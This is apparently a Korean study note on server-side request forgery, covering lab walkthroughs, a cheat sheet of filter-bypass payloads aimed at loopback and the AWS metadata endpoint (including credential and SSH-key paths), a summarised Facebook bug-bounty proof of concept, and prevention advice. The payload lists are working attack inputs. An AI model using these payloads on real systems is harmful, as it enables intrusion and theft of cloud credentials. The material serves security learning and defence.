Server-side Request Forgery(SSRF)

🔎 What is SSRF?

Server-side request forgery(SSRF)는 공격자의 요청을 백엔드 서버단으로 요청하여 내부 서버시스템에 접근하거나 임의의 명령을 실행할 수 있는 취약점 입니다.

Basic SSRF against the local server

쇼핑몰의 URL에 /admin 디렉터리로 접근 시 어드민 계정으로 접근하거나, loopback요청에서만 접근이 가능하다고 접근이 거부됩니다

ssrf0

쇼핑몰에서 한 상품의 재고를 확인하는 기능이 있습니다.
해당 기능은 파라미터를 확인해보면 백엔드에 요청하여 재고가 남아있는지 확인하는 기능입니다.

ssrf1

재고 확인시 요청되는 파라미터를 localhost 주소로 변조하여 SSRF 공격을 진행할 수 있습니다.

변조 전 : 
http://stock.weliketoshop.net:8080/product/stock/check?productId=13&storeId=1

변조 후 :
http://localhost/admin

요청 파라미터 변조

admin계정 또는 loopback에서만 접근할 수 있었던 admin 페이지에 접근이 가능해집니다.

ssrf4 admin페이지에 접근가능

SSRF with blacklist-based input filter

127.0.0.1이 필터링 당하고 있을경우

http://127.1/

ssrf1

ssrf2

admin이 필터링 당하고 있을경우

//URL 인코딩을 사용하여 우회시도
http://127.0.0.1/%61dmin
http://127.0.0.1/%2561dmin

ssrf3

ssrf4

🍁 Cheat sheet

Basic payloads with localhost

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
http://localhost:80
http://localhost:443
http://localhost:22

Bypass using a decimal IP location

http://2130706433/ = http://127.0.0.1
http://017700000001/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/  = http://169.254.169.254

Bypass using octal IP

http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1

Bypass using URL encoding

http://127.0.0.1/%61dmin
http://127.0.0.1/%2561dmin

SSRF URL for Cloud Instances

SSRF URL for AWS Bucket

# Docs Interesting path to look for at http://169.254.169.254 or http://instance-data
Always here : /latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling) : /latest/user-data
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
# DNS record
http://instance-data
http://169.254.169.254
http://169.254.169.254.nip.io/
# HTTP redirect
Static:http://nicob.net/redir6a
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
# Alternate IP encoding
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
# More urls to include
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
# AWS SSRF Bypasses
Converted Decimal IP: http://2852039166/latest/meta-data/
IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/

🐞 BugBounty Write up

Facebook SSRF

https://amineaboud.medium.com/10000-facebook-ssrf-bug-bounty-402bd21e58e5

서브도메인 탐색 + 파일 브루트포싱 + JS 분석 + SSRF가 합쳐져 페이스북에서 $10000의 포상을 받은 글 입니다.

해당 취약점으로 악의적인 사용자가 Facebook 기업 네트워크에 내부 요청을 보낼 수 있습니다.

facebookssrf1

1. 서브도메인 탐색

서브도메인 탐색을 통해 Facebook의 __phishme.thefacebook.com__ 페이지 발견
해당 페이지는 403 접근권한 에러로 접근이 불가하다고 나옵니다.

facebookssrf2

2. 자바스크립트 파일 브루트포싱

발견한 페이지의 하위 디렉토리를 브루트 포싱 진행
https://phishme.thefacebook.com/**.js

https://phishme.thefacebook.com/Home.js Hidden JS파일 발견

3. Home.js 코드 리뷰

Home.js 파일의 코드를 살펴보던 중 흥미있는 함수 발견
sendPhishRequest = 특정 링크에서 XMLHttpRequest 요청을 보내는 함수

해당 코드를 조금 더 살펴본 결과 다음과 같이 사용되는것을 확인 했습니다.

Util.sendPhishRequest(‘PhishGetItemData.ashx’, { itemId: itemId, ewsUrl: ewsUrl, token: token }

Explotation :

몇가지 임의의 토큰값을 획득한 후 마침내 SSRF 공격에 성공

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

POC:
https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

facebookssrf3

👀 How to Prevent ?

Server Side 요청에 사용되는 입력 Parameter 검증 허용할 URL들을 우선 Write-list 설정을 하고, 필터링 시킬 URL, Scheme, 특수문자 등을 Black-list 로 설정 진행

White list 방식 = 허용할 URL들을 정의해 둔 뒤 입력 받은 URL가 허용 URL인지 검증
Black list 방식 = 금지할 URL, Schema등을 정의해두고 입력 받은 URL에 금지된 URL,Scheme가 있는지 검증
-> 사설 IP가 입력 값으로 주어지면, 에러페이지로 연결
ex) 10.0.0.0 ~ 10.255.255.255, 172.16.0.0 ~ 172.31.255.255, 192.168.0.0 ~ 192.168.255.255
-> loopback 주소가 입력 값으로 주어지면 에러페이지로 연결
ex) localhost, 127.0.0.1 등
-> 불필요한 scheme가 입력값으로 주어지면 에러 페이지로 연결
ex) sftp://, file://, ftp:// 등
-> 불필요한 특수문자가 입력 값으로 주어지면 에러 페이지로 연결
ex) @,%0a 등

📃 References